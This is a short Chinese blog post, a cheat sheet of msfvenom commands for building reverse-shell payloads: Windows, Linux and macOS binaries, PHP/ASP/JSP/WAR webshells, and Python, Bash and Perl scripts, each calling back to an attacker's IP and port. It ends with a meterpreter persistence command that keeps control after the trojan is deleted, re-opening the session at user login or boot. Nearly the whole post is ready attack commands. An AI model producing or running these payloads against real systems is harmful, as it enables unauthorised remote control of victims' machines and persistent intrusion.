msfvenom生成payload的方法

二进制文件

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT= Port -f exe > shell.exe

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= IP LPORT= Port -f elf > shell.elf

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST= IP LPORT= Port -f macho > shell.macho

webshell

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST= IP LPORT= Port -f raw > shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=Port -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= IP LPORT= Port -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST= IP LPORT=Port -f war > shell.war

脚本shell(反弹shell)

Python

msfvenom -p cmd/unix/reverse_python LHOST= IP LPORT=Port -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST= IP LPORT=Port -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST= IP LPORT=Port -f raw > shell.pl

附:持续控制

在攻击成功之后会反弹回一个会话,当木马被删除或不继续运行时,我们就无法再获得反弹的会话,那么想要进行一个持续的控制就需要在第一次获得会话时动一些手脚
run persistence -U -i 5 –r ip port
-U 用户登录时反弹会话 也可以使用-X当系统启动时反弹会话
-i 时间

-------------本文结束感谢您的阅读-------------
  • Post author: SuNu11
  • Post link: http://sunu11.com/2017/08/29/16/
  • Copyright Notice: All articles in this blog are licensed under BY-NC-SA unless stating additionally.